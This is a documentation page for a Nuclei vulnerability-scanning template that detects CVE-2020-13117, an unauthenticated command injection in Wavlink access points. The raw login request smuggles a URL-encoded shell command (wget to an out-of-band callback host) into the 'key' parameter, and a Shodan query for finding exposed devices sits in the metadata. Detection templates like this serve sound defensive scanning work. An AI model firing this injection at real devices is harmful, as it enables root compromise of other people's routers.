Skip to content
Nuclei Templates

Wavlink Multiple AP - Remote Command Injection

ID: CVE-2020-13117

Severity: critical

Author: gy741

Tags: cve,cve2020,wavlink,rce,oast,router

Description

Section titled “Description”

Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the “key” parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.

YAML Source

Section titled “YAML Source”
id: CVE-2020-13117


info:
  name: Wavlink Multiple AP - Remote Command Injection
  author: gy741
  severity: critical
  description: Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may also be affected.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13117
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13117
    cwe-id: CWE-77
    epss-score: 0.09416
    epss-percentile: 0.94709
    cpe: cpe:2.3:h:wavlink:wn575a4:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wn575a4
    shodan-query: http.title:"Wi-Fi APP Login"
  tags: cve,cve2020,wavlink,rce,oast,router


http:
  - raw:
      - |
        POST /cgi-bin/login.cgi HTTP/1.1
        Host: {{Hostname}}
        Origin: http://{{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept-Encoding: gzip, deflate


        newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"


      - type: word
        part: body
        words:
          - "parent.location.replace"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022002d4a0b38c14b8394701ae4998b7c60a834b93ce988f11101fc3761b5835a34c022100a71dc2c60d71a8ca3a956673550cc40d3263174b08306c982f64396b0013af7f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-13117.yaml"

View on Github